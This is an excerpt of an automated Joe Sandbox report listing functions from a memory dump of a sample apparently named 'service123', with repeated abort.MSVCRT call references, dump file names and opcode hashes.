abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction ID: 1f5f2e4e2c2bb3e90a916329ff3e32577a8c47142bae9bc40784490a40b6ae6d
Opcode Fuzzy Hash: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction Fuzzy Hash: 59F027317DD03F8A87803A1D40108A1737B7A6B70DB9E0681FC807BE28D661D403CE83

Function 6C2CBEE7 Relevance: 37.6, APIs: 25, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e9094714dbc703abca99e4c49a2978511b3c3c62cdf7df19b5858b914d9656
Instruction ID: 9dab5aad8666f381cd567b373c75a4c981447e6ef7443ce53f41f3faa638e8fc
Opcode Fuzzy Hash: 73e9094714dbc703abca99e4c49a2978511b3c3c62cdf7df19b5858b914d9656
Instruction Fuzzy Hash: 18016D73B05A2E07D3904E74C4E1361B6A25F83318F098769ED7527F8AC638A808AB41

Function 6C2CBC1B Relevance: 37.6, APIs: 25, Instructions: 55COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction ID: 69c12881cc049f53b5ac8dd892ebc07dc7dcccb478903313c8432712bd6f4fa9
Opcode Fuzzy Hash: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction Fuzzy Hash: 67E08C3374A32D4B85907998B4504AAB2689F62358F121D28DD28B3D10E752E85C8AC3

Function 6C2CBE00 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction ID: 92b1c0479b1ee050d911743e92bd06a23841dc730e771e5790b9bd2cff75952f
Opcode Fuzzy Hash: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction Fuzzy Hash: DAD05E3165D12F4B8B446E2840A98A9F2B96F5630871A5994D845B3A05EA21EA098E05

Function 6C2CBE70 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction ID: 7974bf8cdf2f5a62b8845fcf43a9031fdb765fcd1d7d7ad6856d0e10f89ec57d
Opcode Fuzzy Hash: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction Fuzzy Hash: B1D0123028971D8F8340FF48D194869B7F59F4A305B029E65D805A7B20D635D408CE41

Function 6C2CBDC7 Relevance: 37.5, APIs: 25, Instructions: 44COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction ID: 3e07551a3636bf40dd6a5bc4c57f4e39fba798f6c88e5b863349217f82ecf0ba
Opcode Fuzzy Hash: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction Fuzzy Hash: BFC01222A9932D4BC1503D981061766F2A49F27208F132D58DC5533E008F61F8048D86

Function 6C2CBE98 Relevance: 37.5, APIs: 25, Instructions: 43COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction ID: eea2053818d4a1e63c8433f41a5e03ff2c353ba2bb598f5bfe0e683670705ac7
Opcode Fuzzy Hash: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction Fuzzy Hash: D6C0123675A22D8B8280BE8490618A9B274AF6B308F022D94DC1173B108B70F408CD82

Function 6C2CBDE8 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D44
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D4C
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D51
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D56
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D5B
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D60
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction ID: 95b21dbae014bf7f72d6187fa366ce441a6165a428cc5a9e0552380feb9c21eb
Opcode Fuzzy Hash: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction Fuzzy Hash: 67C08C32ADD32D4740803D4810A1878B2A80B27228B072E54DC0033F00CE26E8488C86

Function 6C2CC150 Relevance: 36.3, APIs: 24, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef8587e61a9dc160dd4dd4085f176eb2fb446452ad22b366f0decf1e9eca6bdf
Instruction ID: 52cbb2b15a2c8649753fbdc28fa568c2042ae79413e4252c8c84c2f05031b988
Opcode Fuzzy Hash: ef8587e61a9dc160dd4dd4085f176eb2fb446452ad22b366f0decf1e9eca6bdf
Instruction Fuzzy Hash: 40B1B07160834A8FD710DF58C480B5ABBE1BF86308F084A6DEDA49BB42D375E905CB93

Function 6C2CC470 Relevance: 33.2, APIs: 22, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2CC5DB), ref: 6C396D26
